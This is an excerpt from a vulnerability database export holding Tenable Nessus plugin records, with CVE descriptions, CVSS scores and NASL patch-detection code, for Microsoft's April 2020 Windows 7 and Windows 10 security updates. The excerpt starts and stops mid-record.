addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550964.NASL", "href": "https://www.tenable.com/plugins/nessus/135472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135472);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550964\");\n script_xref(name:\"MSKB\", value:\"4550965\");\n script_xref(name:\"MSFT\", value:\"MS20-4550964\");\n script_xref(name:\"MSFT\", value:\"MS20-4550965\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550965\nor cumulative update 4550964. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550964/windows-7-update-kb4550964\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c90e16d\");\n # https://support.microsoft.com/en-us/help/4550965/windows-7-update-kb4550965\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d52628ac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550965 or Cumulative Update KB4550964.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550964', '4550965');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550964, 4550965])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-04T14:39:26", "description": "The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550930: Windows 10 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0784", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550930.NASL", "href": "https://www.tenable.com/plugins/nessus/135469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135469);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n 